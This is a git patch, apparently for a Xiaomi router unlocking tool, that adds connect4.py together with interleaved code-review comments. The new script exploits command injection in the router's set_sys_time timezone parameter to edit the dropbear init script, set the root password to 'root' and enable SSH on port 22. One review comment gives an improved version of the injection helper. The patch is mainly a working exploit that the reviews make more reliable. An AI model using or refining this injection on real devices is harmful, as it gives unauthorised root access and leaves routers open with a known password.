From b7702b432dca26f990e280e24171828eb1f82ab4 Mon Sep 17 00:00:00 2001
From: remittor
Date: Wed, 14 Sep 2022 14:53:10 +0300
Subject: [PATCH] Add new exploit for RB01, RB06, RB08

---
 connect.py  |  8 ++++--
 connect4.py | 70 +++++++++++++++++++++++++++++++++++++++++++++++++++++
 xqimage.py  | 18 ++++++++++++--
 3 files changed, 92 insertions(+), 4 deletions(-)
 create mode 100644 connect4.py

diff --git a/connect.py b/connect.py
index 7c7775a..b0b5c94 100644
--- a/connect.py
+++ b/connect.py
@@ -31,7 +31,7 @@ if gw.status < 1:
 
 dn = gw.device_name
 
-if dn == 'R2100' or dn == 'R2350' or dn == 'RM1800' or dn == 'RM2100' or dn == 'RA67':
+if dn in 'R2100 R2350 RM1800 RM2100 RA67':
     import connect2
     sys.exit(0)
 
@@ -39,10 +39,14 @@ if dn == 'R3600' and gw.rom_version == '1.0.17':
     import connect2
     sys.exit(0)
 
-if dn == 'R3600' or dn == 'RA69' or dn == 'RA70' or dn == 'RA72' or dn == 'RB03':
+if dn in 'R3600 RA69 RA70 RA72':
     import connect3
     sys.exit(0)
 
+if dn in 'RB01 RB03 RB06 RB08':
+    import connect4
+    sys.exit(0)
+
 print("device_name =", gw.device_name)
 print("rom_version = {} {}".format(gw.rom_version, gw.rom_channel))
 print("mac = {}".format(gw.mac_address))
diff --git a/connect4.py b/connect4.py
new file mode 100644
index 0000000..66cefae
--- /dev/null
+++ b/connect4.py
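Review bot: `if dn in 'R2100 R2350 RM1800 RM2100 RA67':` is a substring test on one string literal, not membership in a list, so it does not mean what the `==` chain it replaces meant: `'R2'`, `'RM'`, `'2100'` and, most importantly, an empty `device_name` (`'' in s` is always True) all get routed to connect2. If `gw.device_name` can come back empty when detection fails, every unrecognised box now runs the connect2 exploit instead of falling through to the prints below. Write it as a real collection, `if dn in ('R2100', 'R2350', 'RM1800', 'RM2100', 'RA67'):`, or keep the compact form with `'R2100 R2350 RM1800 RM2100 RA67'.split()`.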
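Review bot: Both `if dn in 'R3600 RA69 RA70 RA72':` and `if dn in 'RB01 RB03 RB06 RB08':` are substring tests on a string literal, so a truncated or partial `device_name` such as `'RA7'`, `'R36'` or `'RB0'` matches the first of them and is sent to connect3; use tuples, `if dn in ('R3600', 'RA69', 'RA70', 'RA72'):` and `if dn in ('RB01', 'RB03', 'RB06', 'RB08'):`. The hunk also moves RB03 from the connect3 path to the new connect4 path while the subject line names only RB01, RB06 and RB08; if that is deliberate it deserves a sentence in the commit message, since RB03 owners now get a different exploit than before. The `if dn == 'R3600' and gw.rom_version == '1.0.17':` block whose body opens this hunk starts outside it.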
@@ -0,0 +1,70 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+import os
+import sys
+import types
+import platform
+import ctypes
+import binascii
+import re
+import requests
+import urllib
+
+sys.path.append(os.path.dirname(os.path.abspath(__file__)))
+from gateway import *
+
+# Devices:
+# RB01 FW any AX3200
+# RB06 FW any Redmi AX6000
+# RB08 FW any WifiHome
+
+
+gw = Gateway(timeout = 4, detect_ssh = False)
+if gw.status < 1:
+    die("Xiaomi Mi Wi-Fi device not found (IP: {})".format(gw.ip_addr))
+
+print("device_name =", gw.device_name)
+print("rom_version = {} {}".format(gw.rom_version, gw.rom_channel))
+print("mac address = {}".format(gw.mac_address))
+
+dn = gw.device_name
+gw.ssh_port = 22
+ret = gw.detect_ssh(verbose = 1, interactive = True)
+if ret > 0:
+    die(0, "SSH server already installed and running")
+
+stok = gw.web_login()
+
+def exec_cmd(cmd = {}, api = 'misystem/set_sys_time'):
+    params = cmd
+    if isinstance(cmd, str):
+        params = { 'timezone': " ' ; " + cmd + " ; " }
+    res = requests.get(gw.apiurl + api, params = params)
+    return res.text
+
+res = exec_cmd(api = 'xqnetwork/get_netmode')
+if '"code":0' not in res:
+    die('Extension "/api/xqnetwork/get_netmode" not working!')
+if '"netmode":4,' not in res:
+    die('It is necessary to reorganize the device into "whc_cap" mode!')
+
+#res = exec_cmd('logger hello_world_3335556_')
+res = exec_cmd("sed -i 's/`nvram get ssh_en`/1/g' /etc/init.d/dropbear")
+if '"code":0' not in res:
+    die('Exploit not working!!!')
+res = exec_cmd("sed -i 's/release/XXXXXX/g' /etc/init.d/dropbear")
+res = exec_cmd("(echo root; sleep 1; echo root) | passwd root")
+res = exec_cmd("/etc/init.d/dropbear enable")
+print('Run SSH server on port 22 ...')
+res = exec_cmd("/etc/init.d/dropbear restart")
+res = exec_cmd("logger -t XMiR ___completed___")
+
+time.sleep(0.5)
+gw.use_ssh = True
+gw.passw = 'root'
+gw.ping(contimeout = 10) # RSA host key generate slowly!
+
+print("")
+print('#### SSH and Telnet services are activated! ####')
+
diff --git a/xqimage.py b/xqimage.py
index 1ef648d..fb6d667 100644
--- a/xqimage.py
+++ b/xqimage.py
@@ -80,8 +80,22 @@ xqModelList = [
     "RA74", # AX5400
     "",
     "YY01",
-    "RB01", # 50
-    "RB03" # 51
+    "RB01", # 50 # AX3200 (INT)
+    "RB03", # 51 # AX6S
+    "",
+    "",
+    "RB04", # 54 # Redmi AX5400
+    "",
+    "",
+    "",
+    "RB08", # 58 # HomeWiFi
+    "",
+    "",
+    "RB06", # 61 # Redmi AX6000
+    "",
+    "",
+    "CB04", # 64
+    "CB0401", # 65
 ]
 
 def get_modelid_by_name(name):
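Review bot: `time.sleep(0.5)` near the end of the hunk uses `time`, which connect4.py never imports (the import group lists only os, sys, types, platform, ctypes, binascii, re, requests and urllib), so unless `from gateway import *` happens to re-export it this line raises NameError after the device has already been modified; add `import time` to the stdlib group. The responses of the `passwd root`, `dropbear enable` and `dropbear restart` steps are discarded, so the closing "SSH and Telnet services are activated" banner is printed even when one of them failed; check each response the way the first `sed` step is checked (to the extent the API's `code` field reflects the injected command, which that existing `Exploit not working` check already relies on), as sketched below. The sequence also leaves the router reachable on port 22 with the password `root`, and the `sed -i 's/release/XXXXXX/g'` line is unexplained — comments such as `# Leaves root:root on port 22; tell the user to change it` and `# presumably stops the init script from disabling dropbear on release builds — confirm` would tell the next reader what they are signing up for. `requests.get` in `exec_cmd` has no timeout, so a device that stops answering mid-sequence hangs the script indefinitely; the mutable `cmd = {}` default is harmless today but easy to fix at the same time.
```python
def exec_cmd(cmd = None, api = 'misystem/set_sys_time', timeout = 10):
    # Injects `cmd` into the unquoted timezone parameter of set_sys_time.
    params = {} if cmd is None else cmd
    if isinstance(cmd, str):
        params = { 'timezone': " ' ; " + cmd + " ; " }
    res = requests.get(gw.apiurl + api, params = params, timeout = timeout)
    return res.text

def run_step(cmd):
    # Abort on the first step the API does not acknowledge with code 0.
    res = exec_cmd(cmd)
    if '"code":0' not in res:
        die('Exploit step failed: {}'.format(cmd))
    return res

# … unchanged: get_netmode checks …
run_step("sed -i 's/`nvram get ssh_en`/1/g' /etc/init.d/dropbear")
run_step("sed -i 's/release/XXXXXX/g' /etc/init.d/dropbear")
run_step("(echo root; sleep 1; echo root) | passwd root")
run_step("/etc/init.d/dropbear enable")
print('Run SSH server on port 22 ...')
run_step("/etc/init.d/dropbear restart")
# … unchanged: logger, sleep, ping and banner …
```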
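Review bot: The new `"CB04", # 64` and `"CB0401", # 65` entries carry no device name, unlike every other populated entry in the hunk, and nothing in the file says that list position is the model id and that the `""` fillers exist only to keep later indices aligned. A header comment above the list, e.g. `# Index == Xiaomi model id; "" entries are unassigned ids and must stay in place`, would stop the next edit from "cleaning up" the blanks and silently shifting RB04, RB08, RB06 and CB04 by several positions; `xqModelList = [` opens before the hunk, so that comment goes outside it. `get_modelid_by_name` at the hunk's end presumably resolves a name to its index — if it searches by value, an empty `name` would match the first `""` filler rather than fail; its body is outside the hunk, so confirm there.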